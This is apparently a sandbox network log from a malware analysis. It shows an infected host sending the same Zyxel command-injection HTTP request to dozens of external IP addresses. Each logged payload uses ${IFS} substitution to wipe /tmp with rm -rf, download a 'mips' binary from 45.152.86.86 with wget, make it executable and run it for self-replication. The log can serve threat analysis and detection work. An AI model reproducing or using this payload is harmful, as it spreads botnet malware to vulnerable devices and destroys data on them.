                                        Mar 31, 2024 09:20:53.536920071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2786192.168.2.2344128123.51.175.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.536966085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2787192.168.2.2341684220.249.176.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537070036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2788192.168.2.2360896121.154.124.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537137032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2789192.168.2.2337188217.44.161.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537195921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2790192.168.2.2338602217.222.101.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537251949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2791192.168.2.2344110212.65.143.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537337065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2792192.168.2.2340636108.198.129.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537408113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2793192.168.2.2352374205.115.201.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537467003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2794192.168.2.236018039.57.208.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537527084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2795192.168.2.2355378209.126.251.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537612915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2796192.168.2.2345386150.248.206.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537672997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2797192.168.2.233965652.84.146.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537766933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2798192.168.2.2359342109.32.52.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537822962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2799192.168.2.2351912101.188.104.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537909985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2800192.168.2.233367827.182.154.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.537985086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2801192.168.2.233593237.91.194.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538041115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2802192.168.2.2337818101.141.55.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538127899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2803192.168.2.233739478.173.222.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538177967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2804192.168.2.2336686160.120.110.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538244009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2805192.168.2.2340798223.180.136.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538332939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2806192.168.2.2340358136.197.108.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538398027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2807192.168.2.233863661.250.20.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538455963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2808192.168.2.2347656159.160.161.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538528919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2809192.168.2.2354464208.122.84.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538615942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2810192.168.2.2350728109.148.4.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538686037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2811192.168.2.233730297.176.175.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538738012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2812192.168.2.2338988152.232.227.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538799047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2813192.168.2.233401061.104.240.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538883924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2814192.168.2.2345638158.184.131.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.538949966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2815192.168.2.234351280.67.91.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539007902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2816192.168.2.234055617.48.244.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539083004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2817192.168.2.2357070132.150.95.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539160013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2818192.168.2.2339238152.96.112.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539232969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2819192.168.2.2359788167.84.16.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539283991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2820192.168.2.235351046.118.226.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539367914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2821192.168.2.2344554102.171.47.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539429903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2822192.168.2.2336232123.60.237.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539505959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2823192.168.2.2350808139.11.241.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539556026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2824192.168.2.23387749.244.78.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539632082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2825192.168.2.234039242.52.191.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539684057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2826192.168.2.2338518178.158.145.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539742947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2827192.168.2.234414846.142.171.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539822102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2828192.168.2.2358228112.53.228.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539870024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2829192.168.2.2351596185.44.31.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.539952993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2830192.168.2.2345220115.48.79.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540024042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2831192.168.2.23563629.239.172.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540072918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2832192.168.2.2350428150.74.38.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540159941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2833192.168.2.233870848.46.62.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540235996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2834192.168.2.2344316135.39.141.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540314913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2835192.168.2.233654890.139.74.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540374994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2836192.168.2.2343942183.246.129.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540472984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2837192.168.2.2340664203.84.146.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540534019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2838192.168.2.235784491.135.227.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540621042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2839192.168.2.2354520188.212.124.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540673018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2840192.168.2.235599420.200.120.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540740013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2841192.168.2.233337274.208.172.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540811062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2842192.168.2.2358984201.204.57.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540883064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2843192.168.2.2357160105.34.28.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.540942907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2844192.168.2.2356156159.165.149.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541018963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2845192.168.2.235235459.87.177.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541074038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2846192.168.2.2352788151.29.219.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541145086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2847192.168.2.2337544133.53.94.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541239023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2848192.168.2.2347198108.235.188.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541287899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2849192.168.2.2346396125.16.19.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541363955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2850192.168.2.233471873.222.46.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541434050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2851192.168.2.236057698.134.153.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541505098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2852192.168.2.235863236.225.131.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.541579962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2853192.168.2.2337032111.226.53.41443
                                        TimestampBytes transferredDirectionData
